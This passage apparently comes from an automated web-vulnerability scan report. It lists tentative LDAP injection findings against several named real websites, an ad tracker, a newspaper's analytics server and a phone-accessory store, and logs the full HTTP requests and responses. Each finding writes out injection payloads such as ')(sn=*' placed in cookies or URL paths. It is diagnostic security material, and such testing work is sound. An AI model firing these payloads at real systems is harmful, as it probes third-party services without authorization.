User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:26 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 150267e1551cb568)(sn=*_login=13050356060184616714150267e1551cb568)(sn=*; path=/
Set-Cookie: 150267e1551cb568)(sn=*_reset=1305035606;path=/
Expires: Mon, 09 May 2011 19:53:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=150267e1551cb568)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=728x90&cm_mmca2=728x90_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=22K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:26 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 150267e1551cb568)!(sn=*_login=13050356060184616714150267e1551cb568)!(sn=*; path=/
Set-Cookie: 150267e1551cb568)!(sn=*_reset=1305035606;path=/
Expires: Mon, 09 May 2011 19:53:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.4. http://map.media6degrees.com/orbserv/hbjs [vstcnt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The vstcnt cookie appears to be vulnerable to LDAP injection attacks.

The payloads d2e0578dab0d062e)(sn=* and d2e0578dab0d062e)!(sn=* were each submitted in the vstcnt cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000
000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5u20000000y3m0316aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03; sglst=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; vstcnt=d2e0578dab0d062e)(sn=*

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:15 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tke0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:15 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkzf63000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkzf63000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkzf63000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkzf63000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkzf63000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkzf63000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkzf63000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01
...[SNIP]...

Request 2

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=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; sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50ud
gflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500cthlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=d2e0578dab0d062e)!(sn=*

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:16 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tkf0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:16 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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
...[SNIP]...

2.5. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.philly.com
Path:   /b/ss/phillycom/1/H.17/s67586282941047

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 53d4c597f94350b7)(sn=* and 53d4c597f94350b7)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /53d4c597f94350b7)(sn=*/ss/phillycom/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:19:08 GMT
Server: Omniture DC/2.0.0
Content-Length: 454
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /53d4c597f94350b7)(sn=*/ss/phillycom/1/H.17/s67586282941047 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Omniture DC/2.0.0 Server at metrics.philly.com Port 80</address>
</body></html>

Request 2

GET /53d4c597f94350b7)!(sn=*/ss/phillycom/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:19:09 GMT
Server: Omniture DC/2.0.0
xserver: www639
Content-Length: 0
Content-Type: text/html


2.6. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.smartphoneexperts.com
Path:   /content/customercare/page-status.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /content/customercare/*)(sn=* HTTP/1.1
Host: secure.smartphoneexperts.com
Connection: keep-alive
Referer: https://secure.smartphoneexperts.com/content/customercare/page-status.htm?store_id_secure=15&d=1317&ab_testing_session_serialized=
Cache-Control: max-age=0
Origin: https://secure.smartphoneexperts.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2v4he5hjga328e0btuv0u9apu5; store_id_secure=15; visitor_id=7bafa0a9256e3f802a19af1811a6ef80; cookie_treo_model=1317; device_id_history=1317; __utmz=1.1305036217.1.1.utmcsr=store.androidcentral.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/customercare/index.htm; __utmv=1.store.androidcentral.com; __utma=1.1567419967161159700.1305036217.1305036217.1305036217.1; __utmc=1; __utmb=1.6.10.1305036217
Content-Length: 69

data_process=billing&order_id=&zip_code=&process=login&I2.x=79&I2.y=5

Response 1

HTTP/1.1 200 OK
Server: spe
Date: Tue, 10 May 2011 14:10:58 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<span class='customer_testimonials'>&quot;Thanks again for your excellent customer care - I will be back to shop with your company again, without a doubt.&quot;<br />
- Matthew, TX
</span>
</div>
<div class='sidebar-fot'></div>
</div>
</div> <!-- content END -->
</div> <!-- container END -->
</div> <!-- container-wrapper END -->
</div> <!-- background END -->
<div class='footer-wrapper'>
<div class='footer'>
<p>Copyright &copy 1999-2011 <a class='text_small' href='http://www.smartphoneexperts.com'>Smartphone Experts</a>. All rights reserved.
<a class='text_small' href='http://store.androidcentral.com/content/customercare/page-privacy.htm'>Privacy Policy</a>.
       <a class='text_small' href='http://store.androidcentral.com/motorola-droid-x-accessories.htm'>Motorola Droid X Accessories</a>.
   <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p>
</div>
</div>
</div> <!-- background-wrapper END -->
<script type='text/javascript'>
jQuery(function() {
   var url = window.location.href;url = url.substr(url.lastIndexOf("/") + 1);
   if (url!='') $('.header-menu1').find("a[href*='" + url + "']").addClass('active');
});
</script>

<script type='text/javascript'>
jQuery(function() {

// Clue Tip
   $('a.tips').cluetip();
   $('a.tips_cart:eq(0)').cluetip({
       width:340
   });
});

// Content Slider
try {
   featuredcontentglider.init({
       gliderid: 'fader', //ID of main glider container
       contentclass: 'fader-content', //Shared CSS class name of each glider content
       togglerid: 'fader-toggle', //ID of toggler container
       remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable
       selected: 0, //Default selected content index (0=1st)
       persiststate: false, //Remember last content shown within browser session (true/false)?
       speed: 500, //Glide animation duration (in milliseconds)
       autorotate: true, //Auto rotate contents (true/false)?
       autorotateconfig: [5000,500] //if auto rotate en
...[SNIP]...

Request 2

POST /content/customercare/*)!(sn=* HTTP/1.1
Host: secure.smartphoneexperts.com
Connection: keep-alive
Referer: https://secure.smartphoneexperts.com/content/customercare/page-status.htm?store_id_secure=15&d=1317&ab_testing_session_serialized=
Cache-Control: max-age=0
Origin: https://secure.smartphoneexperts.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2v4he5hjga328e0btuv0u9apu5; store_id_secure=15; visitor_id=7bafa0a9256e3f802a19af1811a6ef80; cookie_treo_model=1317; device_id_history=1317; __utmz=1.1305036217.1.1.utmcsr=store.androidcentral.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/customercare/index.htm; __utmv=1.store.androidcentral.com; __utma=1.1567419967161159700.1305036217.1305036217.1305036217.1; __utmc=1; __utmb=1.6.10.1305036217
Content-Length: 69

data_process=billing&order_id=&zip_code=&process=login&I2.x=79&I2.y=5

Response 2

HTTP/1.1 200 OK
Server: spe
Date: Tue, 10 May 2011 14:10:58 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 64947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<span class='customer_testimonials'>&quot;You are the most customer service friendly site I have bought from in months. I am going to enjoy ordering supplies from you in the future.&quot;<br />
- Joseph, VA
</span>
</div>
<div class='sidebar-fot'></div>
</div>
</div> <!-- content END -->
</div> <!-- container END -->
</div> <!-- container-wrapper END -->
</div> <!-- background END -->
<div class='footer-wrapper'>
<div class='footer'>
<p>Copyright &copy 1999-2011 <a class='text_small' href='http://www.smartphoneexperts.com'>Smartphone Experts</a>. All rights reserved.
<a class='text_small' href='http://store.androidcentral.com/content/customercare/page-privacy.htm'>Privacy Policy</a>.
       <a class='text_small' href='http://store.androidcentral.com/motorola-droid-x-accessories.htm'>Motorola Droid X Accessories</a>.
   <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p>
</div>
</div>
</div> <!-- background-wrapper END -->
<script type='text/javascript'>
jQuery(function() {
   var url = window.location.href;url = url.substr(url.lastIndexOf("/") + 1);
   if (url!='') $('.header-menu1').find("a[href*='" + url + "']").addClass('active');
});
</script>

<script type='text/javascript'>
jQuery(function() {

// Clue Tip
   $('a.tips').cluetip();
   $('a.tips_cart:eq(0)').cluetip({
       width:340
   });
});

// Content Slider
try {
   featuredcontentglider.init({
       gliderid: 'fader', //ID of main glider container
       contentclass: 'fader-content', //Shared CSS class name of each glider content
       togglerid: 'fader-toggle', //ID of toggler container
       remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable
       selected: 0, //Default selected content index (0=1st)
